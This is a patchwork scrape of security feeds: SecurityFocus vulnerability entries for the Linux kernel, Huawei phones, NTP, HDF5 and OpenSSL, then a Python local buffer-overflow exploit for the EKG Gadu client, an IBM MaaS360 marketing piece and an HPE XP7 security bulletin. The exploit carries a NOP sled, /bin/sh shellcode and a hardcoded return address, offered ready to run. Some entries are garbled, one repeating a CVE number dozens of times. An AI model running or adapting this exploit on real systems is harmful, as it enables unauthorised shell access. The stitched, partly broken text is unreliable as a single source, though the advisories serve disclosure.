Local

Vulnerable: Linux kernel 4.2.3
Linux kernel 4.1.4
Linux kernel 4.1.1
Linux kernel 4.0.6
Linux kernel 3.19.3
Linux kernel 3.18.22
Linux kernel 3.18.17
Linux kernel 3.18.11
Linux kernel 3.18.8
Linux kernel 3.18.7
Linux kernel 3.18.3
Linux kernel 3.18.2
Linux kernel 3.18.1
Linux kernel 3.17.4
Linux kernel 3.17.2
Linux kernel 3.16.7
Linux kernel 3.16.2
Linux kernel 3.16.1
Linux kernel 3.15.10
Linux kernel 3.15.5
Linux kernel 3.15.2
Linux kernel 3.14.54
Linux kernel 3.14.45
Linux kernel 3.14.37
Linux kernel 3.14.4
Linux kernel 3.14.3
Linux kernel 3.14.2
Linux kernel 3.13.11
Linux kernel 3.13.9
Linux kernel 3.13.3
Linux kernel 3.13.1
Linux kernel 3.12.49
Linux kernel 3.12.48
Linux kernel 3.12.44
Linux kernel 3.12.40
Linux kernel 3.12.21
Linux kernel 3.12.18
Linux kernel 3.12.17
Linux kernel 3.12.16
Linux kernel 3.12.11
Linux kernel 3.12.7
Linux kernel 3.12.4
Linux kernel 3.12.3
Linux kernel 3.12.2
Linux kernel 3.11.3
Linux kernel 3.10.90
Linux kernel 3.10.81
Linux kernel 3.10.73
Linux kernel 3.10.45
Linux kernel 3.10.41
Linux kernel 3.10.38
Linux kernel 3.10.37
Linux kernel 3.10.36
Linux kernel 3.10.30
Linux kernel 3.10.27
Linux kernel 3.10.26
Linux kernel 3.10.23
Linux kernel 3.10.22
Linux kernel 3.10.21
Linux kernel 3.10.14
Linux kernel 3.10.10
Linux kernel 3.10.9
Linux kernel 3.10.7
Linux kernel 3.8.9
Linux kernel 3.8.6
Linux kernel 3.8.5
Linux kernel 3.8.4
Linux kernel 3.8.2
Linux kernel 3.8.1
Linux kernel 3.7.10
Linux kernel 3.7.9
Linux kernel 3.7.8
Linux kernel 3.7.7
Linux kernel 3.7.5
Linux kernel 3.7.4
Linux kernel 3.7.3
Linux kernel 3.7.2
Linux kernel 3.7.1
Linux kernel 3.6.11
Linux kernel 3.6.10
Linux kernel 3.6.9
Linux kernel 3.6.8
Linux kernel 3.6.7
Linux kernel 3.6.6
Linux kernel 3.6.5
Linux kernel 3.6.4
Linux kernel 3.6.3
Linux kernel 3.6.2
Linux kernel 3.6.1
Linux kernel 3.5.7
Linux kernel 3.5.6
Linux kernel 3.5.5
Linux kernel 3.5.4
Linux kernel 3.5.3
Linux kernel 3.5.2
Linux kernel 3.5.1
Linux kernel 3.4.88
Linux kernel 3.4.87
Linux kernel 3.4.86
Linux kernel 3.4.80
Linux kernel 3.4.76
Linux kernel 3.4.73
Linux kernel 3.4.72
Linux kernel 3.4.71
Linux kernel 3.4.64
Linux kernel 3.4.58
Linux kernel 3.4.42
Linux kernel 3.4.36
Linux kernel 3.4.32
Linux kernel 3.4.31
Linux kernel 3.4.27
Linux kernel 3.4.26
Linux kernel 3.4.25
Linux kernel 3.4.21
Linux kernel 3.4.20
Linux kernel 3.4.19
Linux kernel 3.4.18
Linux kernel 3.4.17
Linux kernel 3.4.16
Linux kernel 3.4.15
Linux kernel 3.4.14
Linux kernel 3.4.13
Linux kernel 3.4.12
Linux kernel 3.4.11
Linux kernel 3.4.10
Linux kernel 3.4.9
Linux kernel 3.4.8
Linux kernel 3.4.7
Linux kernel 3.4.6
Linux kernel 3.4.5
Linux kernel 3.4.4
Linux kernel 3.4.3
Linux kernel 3.4.2
Linux kernel 3.4.1
Linux kernel 3.3.5
Linux kernel 3.3.4
Linux kernel 3.3.2
Linux kernel 3.2.82
Linux kernel 3.2.72
Linux kernel 3.2.62
Linux kernel 3.2.57
Linux kernel 3.2.56
Linux kernel 3.2.51
Linux kernel 3.2.24
Linux kernel 3.2.23
Linux kernel 3.2.13
Linux kernel 3.2.12
Linux kernel 3.2.9
Linux kernel 3.2.1
Linux kernel 3.1.8
Linux kernel 3.0.98
Linux kernel 3.0.75
Linux kernel 3.0.72
Linux kernel 3.0.69
Linux kernel 3.0.65
Linux kernel 3.0.60
Linux kernel 3.0.59
Linux kernel 3.0.58
Linux kernel 3.0.37
Linux kernel 3.0.34
Linux kernel 3.0.5
Linux kernel 3.0.4
Linux kernel 3.0.2
Linux kernel 3.0.1
Linux kernel 2.6.39
Linux kernel 2.6.38
Linux kernel 2.6.37
Linux kernel 2.6.36
Linux kernel 2.6.35
Linux kernel 2.6.34
Linux kernel 2.6.33 .1
Linux kernel 2.6.33
Linux kernel 2.6.32 .9
Linux kernel 2.6.32
Linux kernel 2.6.31 5
Linux kernel 2.6.31 13
Linux kernel 2.6.31 .2
Linux kernel 2.6.31 .11
Linux kernel 2.6.31
Linux kernel 2.6.30 .10
Linux kernel 2.6.30 .1
Linux kernel 2.6.30
Linux kernel 2.6.29 .4
Linux kernel 2.6.29 .1
Linux kernel 2.6.29
Linux kernel 2.6.28 .9
Linux kernel 2.6.28 .8
Linux kernel 2.6.28 .6
Linux kernel 2.6.28 .5
Linux kernel 2.6.28 .3
Linux kernel 2.6.28 .2
Linux kernel 2.6.28 .1
Linux kernel 2.6.28
Linux kernel 2.6.27 6
Linux kernel 2.6.27 3
Linux kernel 2.6.27 12
Linux kernel 2.6.27 .8
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 .46
Linux kernel 2.6.27 .24
Linux kernel 2.6.27 .14
Linux kernel 2.6.27 .13
Linux kernel 2.6.27 .12
Linux kernel 2.6.27
Linux kernel 2.6.26 7
Linux kernel 2.6.26 .6
Linux kernel 2.6.26 .4
Linux kernel 2.6.26 .3
Linux kernel 2.6.26
Linux kernel 2.6.25 19
Linux kernel 2.6.25 .9
Linux kernel 2.6.25 .8
Linux kernel 2.6.25 .7
Linux kernel 2.6.25 .6
Linux kernel 2.6.25 .5
Linux kernel 2.6.25 .15
Linux kernel 2.6.25 .13
Linux kernel 2.6.25 .12
Linux kernel 2.6.25 .11
Linux kernel 2.6.25 .10
Linux kernel 2.6.25
Linux kernel 2.6.24 .2
Linux kernel 2.6.24 .1
Linux kernel 2.6.24
Linux kernel 2.6.23 .7
Linux kernel 2.6.23 .6
Linux kernel 2.6.23 .5
Linux kernel 2.6.23 .4
Linux kernel 2.6.23 .3
Linux kernel 2.6.23 .2
Linux kernel 2.6.23
Linux kernel 2.6.22 .8
Linux kernel 2.6.22 .7
Linux kernel 2.6.22 .6
Linux kernel 2.6.22 .5
Linux kernel 2.6.22 .4
Linux kernel 2.6.22 .3
Linux kernel 2.6.22 .2
Linux kernel 2.6.22 .17
Linux kernel 2.6.22 .16
Linux kernel 2.6.22 .15
Linux kernel 2.6.22 .14
Linux kernel 2.6.22 .13
Linux kernel 2.6.22 .12
Linux kernel 2.6.22 .11
Linux kernel 2.6.22 .1
Linux kernel 2.6.22
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .3
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .7
Linux kernel 2.6.20 .6
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20 .14
Linux kernel 2.6.20 .12
Linux kernel 2.6.20 .10
Linux kernel 2.6.20 .1
Linux kernel 2.6.20
Linux kernel 2.6.19 .4
Linux kernel 2.6.19 .3
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19
Linux kernel 2.6.18 .8
Linux kernel 2.6.18 .7
Linux kernel 2.6.18 .6
Linux kernel 2.6.18 .5
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .2
Linux kernel 2.6.18 .1
Linux kernel 2.6.17 .9
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .4
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .8
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .6
Linux kernel 2.6.16 .53
Linux kernel 2.6.16 .52
Linux kernel 2.6.16 .51
Linux kernel 2.6.16 .50
Linux kernel 2.6.16 .5
Linux kernel 2.6.16 .49
Linux kernel 2.6.16 .48
Linux kernel 2.6.16 .47
Linux kernel 2.6.16 .46
Linux kernel 2.6.16 .45
Linux kernel 2.6.16 .44
Linux kernel 2.6.16 .43
Linux kernel 2.6.16 .41
Linux kernel 2.6.16 .40
Linux kernel 2.6.16 .4
Linux kernel 2.6.16 .39
Linux kernel 2.6.16 .38
Linux kernel 2.6.16 .37
Linux kernel 2.6.16 .36
Linux kernel 2.6.16 .35
Linux kernel 2.6.16 .34
Linux kernel 2.6.16 .33
Linux kernel 2.6.16 .32
Linux kernel 2.6.16 .31
Linux kernel 2.6.16 .30
Linux kernel 2.6.16 .3
Linux kernel 2.6.16 .29
Linux kernel 2.6.16 .28
Linux kernel 2.6.16 .27
Linux kernel 2.6.16 .26
Linux kernel 2.6.16 .25
Linux kernel 2.6.16 .24
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .22
Linux kernel 2.6.16 .21
Linux kernel 2.6.16 .20
Linux kernel 2.6.16 .2
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .18
Linux kernel 2.6.16 .17
Linux kernel 2.6.16 .16
Linux kernel 2.6.16 .15
Linux kernel 2.6.16 .14
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .10
Linux kernel 2.6.16 .1
Linux kernel 2.6.16
Linux kernel 2.6.15 .7
Linux kernel 2.6.15 .6
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15
Linux kernel 2.6.14 .7
Linux kernel 2.6.14 .6
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14
Linux kernel 2.6.13 .5
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12
Linux kernel 2.6.11 .9
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .3
Linux kernel 2.6.11 .2
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 .10
Linux kernel 2.6.11 .1
Linux kernel 2.6.11
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8
Linux kernel 2.6.7
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6
Linux kernel 4.4
Linux kernel 4.3.3
Linux kernel 4.3-rc1
Linux kernel 4.2.8
Linux kernel 4.2
Linux kernel 4.1.15
Linux kernel 4.1-rc7
Linux kernel 4.1-rc6
Linux kernel 4.1-rc3
Linux kernel 4.1-rc1
Linux kernel 4.1
Linux kernel 4.0.5
Linux kernel 4.0
Linux kernel 3.9.8
Linux kernel 3.9.4
Linux kernel 3.9
Linux kernel 3.8
Linux kernel 3.7.6
Linux kernel 3.7
Linux kernel 3.6
Linux kernel 3.5
Linux kernel 3.4.93
Linux kernel 3.4.81
Linux kernel 3.4.70
Linux kernel 3.4.67
Linux kernel 3.4.29
Linux kernel 3.4
Linux kernel 3.3
Linux kernel 3.2.81
Linux kernel 3.2.78
Linux kernel 3.2.65
Linux kernel 3.2.64
Linux kernel 3.2.63-2
Linux kernel 3.2.63
Linux kernel 3.2.60
Linux kernel 3.2.55
Linux kernel 3.2.54
Linux kernel 3.2.53
Linux kernel 3.2.52
Linux kernel 3.2.50
Linux kernel 3.2.44
Linux kernel 3.2.42
Linux kernel 3.2.38
Linux kernel 3.2.2
Linux kernel 3.2
Linux kernel 3.19
Linux kernel 3.18.9
Linux kernel 3.18
Linux kernel 3.17.6
Linux kernel 3.17
Linux kernel 3.16.6
Linux kernel 3.16.36
Linux kernel 3.16
Linux kernel 3.15
Linux kernel 3.14.73
Linux kernel 3.14.7
Linux kernel 3.14.5
Linux kernel 3.14-4
Linux kernel 3.14-1
Linux kernel 3.14
Linux kernel 3.13.7
Linux kernel 3.13.6
Linux kernel 3.13.5
Linux kernel 3.13.4
Linux kernel 3.13
Linux kernel 3.12.22
Linux kernel 3.12.15
Linux kernel 3.12.14
Linux kernel 3.12.12
Linux kernel 3.12.1
Linux kernel 3.12
Linux kernel 3.11.9
Linux kernel 3.11.6
Linux kernel 3.11
Linux kernel 3.10.5
Linux kernel 3.10.43
Linux kernel 3.10.31
Linux kernel 3.10.20
Linux kernel 3.10.17
Linux kernel 3.10
Linux kernel 3.1
Linux kernel 3.0.66
Linux kernel 3.0.62
Linux kernel 3.0.18
Linux kernel 3.0
Linux kernel 2.6.8.1
Linux kernel 2.6.38.6
Linux kernel 2.6.38.4
Linux kernel 2.6.38.3
Linux kernel 2.6.38.2
Linux kernel 2.6.37.2
Linux kernel 2.6.35.5
Linux kernel 2.6.35.4
Linux kernel 2.6.35.13
Linux kernel 2.6.35.1
Linux kernel 2.6.34.3
Linux kernel 2.6.34.2
Linux kernel 2.6.34.14
Linux kernel 2.6.34.13
Linux kernel 2.6.34.1
Linux kernel 2.6.33.7
Linux kernel 2.6.32.8
Linux kernel 2.6.32.7
Linux kernel 2.6.32.62
Linux kernel 2.6.32.61
Linux kernel 2.6.32.60
Linux kernel 2.6.32.6
Linux kernel 2.6.32.5
Linux kernel 2.6.32.4
Linux kernel 2.6.32.3
Linux kernel 2.6.32.28
Linux kernel 2.6.32.22
Linux kernel 2.6.32.2
Linux kernel 2.6.32.18
Linux kernel 2.6.32.17
Linux kernel 2.6.32.16
Linux kernel 2.6.32.15
Linux kernel 2.6.32.14
Linux kernel 2.6.32.13
Linux kernel 2.6.32.12
Linux kernel 2.6.32.11
Linux kernel 2.6.32.10
Linux kernel 2.6.32.1
Linux kernel 2.6.31.6
Linux kernel 2.6.31.4
Linux kernel 2.6.31.1
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.28.4
Linux kernel 2.6.28.10
Linux kernel 2.6.27.54
Linux kernel 2.6.27.51
Linux kernel 2.6.27.49
Linux kernel 2.6.27.26
Linux kernel 2.6.26.1
Linux kernel 2.6.25.4
Linux kernel 2.6.25.3
Linux kernel 2.6.25.2
Linux kernel 2.6.25.1
Linux kernel 2.6.24.6
Linux kernel 2.6.24.4
Linux kernel 2.6.24.3
Linux kernel 2.6.23.14
Linux kernel 2.6.23.10
Linux kernel 2.6.23.1
Linux kernel 2.6.23.09
Linux kernel 2.6.20.3
Linux kernel 2.6.20.2
Linux kernel 2.6.20.13
Linux kernel 2.6.20.11
Linux kernel 2.6.20-2
Linux kernel 2.6.18.1
Linux kernel 2.6.18-53
Linux kernel 2.6.18
Linux kernel 2.6.16.9
Linux kernel 2.6.16.7
Linux kernel 2.6.16.19
Linux kernel 2.6.16.13
Linux kernel 2.6.16.12
Linux kernel 2.6.16.11
Linux kernel 2.6.15.5
Linux kernel 2.6.15.4
Linux kernel 2.6.15.11
Linux kernel 2.6.14.3
Linux kernel 2.6.14.2
Linux kernel 2.6.14.1
Linux kernel 2.6.13.4
Linux kernel 2.6.13.3
Linux kernel 2.6.13.2
Linux kernel 2.6.13.1
Linux kernel 2.6.12.6
Linux kernel 2.6.12.5
Linux kernel 2.6.12.4
Linux kernel 2.6.12.3
Linux kernel 2.6.12.2
Linux kernel 2.6.12.1
Linux kernel 2.6.11.8
Linux kernel 2.6.11.7
Linux kernel 2.6.11.6
Linux kernel 2.6.11.5
Linux kernel 2.6.11.4
Linux kernel 2.6.11.12
Linux kernel 2.6.11.11


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
Multiple Huawei Products CVE-2016-8768 Local Privilege Escalation

Bugtraq ID: 93885
Class: Design Error
CVE: CVE-2016-8768
Remote: No
Local: Yes
Published: Oct 26 2016 12:00AM
Updated: Nov 25 2016 02:04PM
Credit: Zhao Jianqiang, Chen Gengjia, Wang Qize, Zhu Bin and Pan Yu.
Vulnerable: Huawei Honor 7 6.9
Huawei Honor 6 Plus 6.9
Huawei Honor 6 6.9
Not Vulnerable: Huawei Honor 7 6.9.16
Huawei Honor 6 Plus 6.9.16
Huawei Honor 6 6.9.16


SecurityFocus Vulnerabilities

Bugtraq ID: 94455 Class: Failure to Handle Exceptional Conditions CVE: CVE-2016-7433 Remote: No Local: Yes Published: Nov 21 2016 12:00AM Updated: Nov 22 2016 12:12AM Credit: Brian Utterback of Oracle, and Sharon Goldberg and Aanchal Malhotra of Boston University. Vulnerable: NTP NTP 4.3.90
NTP NTP 4.2.8
NTP NTP 4.1.2
NTP NTP 4.3.93
NTP NTP 4.3.92
NTP NTP 4.2.8p8
NTP NTP 4.2.8p7
NTP NTP 4.2.8p6
NTP NTP 4.2.8p5
NTP NTP 4.2.8p4
NTP NTP 4.2.8p3-RC1
NTP NTP 4.2.8p3
NTP NTP 4.2.8p2
NTP NTP 4.2.8p1
NTP NTP 4.2.7p385 Not Vulnerable: NTP NTP 4.3.94
NTP NTP 4.2.8p9


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
HDF5 CVE-2016-4332 Local Heap Overflow Vulnerability

Bugtraq ID: 94417
Class: Boundary Condition Error
CVE: CVE-2016-4332
Remote: No
Local: Yes
Published: Nov 17 2016 12:00AM
Updated: Nov 20 2016 12:12AM
Credit: Cisco Talos.
Vulnerable: HDF5 HDF5 1.8.16
Not Vulnerable:


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
HDF5 CVE-2016-4333 Local Heap Buffer Overflow Vulnerability

Bugtraq ID: 94416
Class: Unknown
CVE: CVE-2016-4333
Remote: No
Local: Yes
Published: Nov 17 2016 12:00AM
Updated: Nov 20 2016 12:12AM
Credit: Cisco Talos.
Vulnerable: HDF5 HDF5 1.8.16
Not Vulnerable:


SecurityFocus Vulnerabilities

Bugtraq ID: 93153 Class: Failure to Handle Exceptional Conditions CVE: CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306
CVE-2016-6306 Remote: No Local: Yes Published: Sep 23 2016 12:00AM Updated: Sep 25 2016 12:00AM Credit: Shi Lei (Gear Team, Qihoo 360 Inc.) Vulnerable: OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1t
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1 Not Vulnerable: OpenSSL Project OpenSSL 1.0.2i
OpenSSL Project OpenSSL 1.0.1u


SecurityFocus Vulnerabilities

# Exploit developed using Exploit Pack v6.01
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
# [email protected]
# Program affected: EKG Gadu
# Affected value: USERNAME
# Version: 1:1.9~pre+r2855-3+b1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: console Gadu Gadu client for UNIX systems - ncurses UI
# EKG ("Eksperymentalny Klient Gadu-Gadu") is an open source
# Gadu-Gadu client for UNIX systems.
# Kali Linux 2.0 package: pool/main/e/ekg/ekg_1.9~pre+r2855-3+b1_i386.deb
# MD5sum: c752577dfb5ea44513a3fb351d431afa
# Website: http://ekg.chmurka.net/
#
# gdb$ run `python -c 'print "A"*258'`
# 0x0807e125 in strlcpy ()
# gdb$ backtrace
# #0 0x0807e125 in strlcpy ()
# #1 0x080570bb in ioctld_socket ()
# #2 0x08052e60 in main ()

import os, subprocess

def run():
try:
print "# EKG Gadu - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack -
http://exploitpack.com"
# NOPSLED + SHELLCODE + EIP

buffersize = 240
nopsled = "\x90"*30
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x20\xf1\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["ekg ",' ', buffer])

except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, EKG Gadu - Not found!"
else:
print "Error executing exploit"
raise

def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)

if __name__ == '__main__':
try:
print "Exploit EKG Gadu - Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()


Exploit Files ≈ Packet Storm

In modern business, the complexity and range of use cases for mobile continues to expand. Mobile data, the catalyst for this growth, is a double-edged sword: It empowers organizations just as much as it endangers them. It provides invaluable information instantaneously and a constant connectivity that enables workers to do their jobs regardless of where they’re situated.

Its benefits notwithstanding, mobile data exposes companies of all types and sizes to innumerable risks related to its transmission, storage and overall level of protection.

Through continued global investment in its platform, services and technology, IBM MaaS360 provides the tools and resources required by worldwide enterprise mobility management (EMM) clients to carefully balance the benefits of mobility with its associated risks. This enables organizations to achieve an equilibrium that ensures:

  • Compliance with local, national and global regulations;
  • Data privacy; and
  • A strong mobile security strategy.

MaaS360 for Cross-Country Data Compliance

Regarded by leading analysts as a best-in-class cloud offering, MaaS360 EMM epitomizes the 24/7 accessibility that empowers organizations to fully enable, manage and secure their mobile devices, apps, docs and data on a global scale. These clients must also comply with local data privacy regulations as their mobile data makes its way across international borders.

To accommodate customers seeking a software-as-a-service (SaaS) offering whose operations extend across foreign countries and continents, MaaS360 has announced an expansion that will extend localized services within the next two years across Europe, Asia and the Americas. Developmental processes have already begun for the first two, for which support will launch in India and France.

MaaS360 will be added to existing IBM Cloud locations. To date, IBM Cloud has amassed 47 data centers across 26 countries, a network with which MaaS360 will continue to grow as IBM further extends its global footprint.

map illustration with pinpoints for all the MaaS360 datacenters launching in 2016

Built for Compliance

MaaS360 will be contextually architected with regional ordinances taken into consideration. This will enable customers to expand their flexibility via global transmissions of mobile data without violating local privacy standards.

For example, European clients, and others whose data flows through Europe, will need to abide by new EU directives arriving in May 2018. The General Data Protection Regulation (GDPR) will dictate how businesses address their data life cycles — things like management, access, storage and security. Those who fail to comply will face costly consequences. It’s important for clients to maintain focus on large-scale mobile rollouts that meet local requirements.

Expert Consultation for GDPR Readiness

Merely complying with regulations should never be the goal. Compliance should be the starting point of a larger strategy built for long-term success.

With IBM Privacy Consulting Services, customers can analyze their current processes and fine-tune their efforts surrounding data privacy. Experienced IBM mobility experts work directly with your internal business, legal, IT and management representatives to address current gaps, establishing best practices to oust the competition and maximize returns on other technology investments.

illustration for MaaS360 datacenter launch announcement in 2016.

With more than a year remaining until the GDPR is in full swing, now is the time for organizations to peel back the layers on their current strategies and determine how they can put their best foot forward for future success within an intensifying regulatory climate.

Leveraging IBM Privacy Consulting Services, clients can assess their readiness for the GDPR and identify the roadblocks they’ll need to overcome between now and May 2018 to ensure they’re acclimatized for data privacy.

New Services to Accelerate Mobile Success

Expanding on its new service offerings portfolio, IBM MaaS360 unveiled a complete program geared toward maturity and success with secure enterprise mobility, including:

  • Mobile Security and Productivity Workshops to ensure strategy, policy and technology are aligned to meet organizational goals for enterprise mobility;
  • Mobility Success Services to help your organization achieve fast time to value for your investment in MaaS360 for mobile devices, apps and content;
  • Health Check Services to assess full mobile environment status, review challenges and recommend actions; and
  • Mobility Training Workshops to impart mobile expertise to operations, administrative and help desk teams.

Among our Mobility Success Services, customers may opt for Quick Start or Time-to-Value Services, which can be completed in as few as six days or up to three months, depending on how thorough of a review they are looking to complete.

Quick Start Services afford fast and exceptional guidance to maximize your investment. With Time-to-Value Services, we remain at your side every step of the way for an in-depth engagement to help maximize ROI and jump-start mobile transformation.

Since the organizations we work with scale widely in size and variety, each service is catered to the unique needs of the individual client. We begin by gathering specific information on the environment in its current state, analyzing findings and measuring for competency with industry standards. We then provide recommendations to ensure all facets of the program are hitting on all cylinders for a successful implementation.

MaaS360 Packaging Structure

In alignment with these new services, IBM recently released new product packaging for MaaS360 that is structured around organizational maturity within the EMM market:

  1. Essentials for entry-level mobility management;
  2. Deluxe for extended control over secure productivity;
  3. Premier for the full gamut of tools needed for access and collaboration; and
  4. Enterprise for sophisticated analysis, malware detection and effortless scaling.

Sequentially organized, each new tier is intended to grow alongside enterprises, taking into account the various malleable forces at play in the ever-changing market. These include strategy shifts, increases in device volume, software and hardware advancements, new use cases for mobile and the growing threat landscape.

EMM Meets CASB for End-to-End Integration

Without the right tools to assess activity, analyze threat severity and enforce corporate policies, cloud resources in your environment can be accessed without authorization. IBM’s latest integration of MaaS360 with IBM Cloud Security Enforcer (CSE) gives system administrators the visibility, analysis and control that is critical to achieving secure mobile cloud resource access in their environment. The integration enables security leaders to:

  • Assess identity and security posture to control access to enterprise cloud apps;
  • Leverage IBM X-Force integrity analyses to evaluate the integrity of accessed resources; and
  • Prohibit access to apps that do not meet security requirements.

Learn More

In the coming weeks, MaaS360 experts will outline the full impact of these new investments and advancements as they make their way to the enterprise. Join us for our upcoming webinars and learn how:

  • MaaS360 will enable adherence to regional data privacy standards;
  • Services aid in the design and development of a modern mobility strategy;
  • Solutions packaging accelerates organizational maturity with enterprise mobility; and
  • CSE integration advances transparency and control over cloud app and resource access.

MaaS360 Goes Global to Keep Data Local — Join the Sept. 28 webinar to learn more


Security Intelligence

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c052577
11

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05257711
Version: 1

HPSBST03640 rev.1 - HP XP7 Command View Advance Edition Suite (CVAE) using
Replication Manager (RepMgr) and Device Manager (DevMgr), Local Access
Restriction Bypass

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-09-01
Last Updated: 2016-09-01

Potential Security Impact: Local Access Restriction Bypass

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP XP7 Command View
Advance Edition Suite (CVAE) using Replication Manager (RepMgr) and Device
Manager (DevMgr). This vulnerability could be locally exploited to allow
access restriction bypass.

References:

- CVE-2016-4381
- PSRT110214

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP XP7 Command View Advanced Edition Suite RepMgr and DevMgr version 6.2.0-00
to versions prior to 8.4.1-02

BACKGROUND

CVSS Base Metrics
=================
Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4381
5.3 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c013454
99

RESOLUTION

HPE has released the following software updates to resolve the vulnerability
in HP XP7 Command View Advance Edition Suite.

- Device Manager (DevMgr) version 8.4.1-02
- Replication Manager (RepMgr) version 8.4.1-02

The updates are available from the following locations.

- Full installer updates:

https://h20575.www2.hp.com/usbportal/softwareupdate.do

- Patches:

https://h20575.www2.hpe.com/tsusbportal/index.do?lc=EN_US&src=HPSC

**Note:** A valid HPE Passport account is needed to download the patches.
Please contact HPE Technical Support for assistance.

HISTORY
Version:1 (rev.1) - 1 September 2016 Initial release

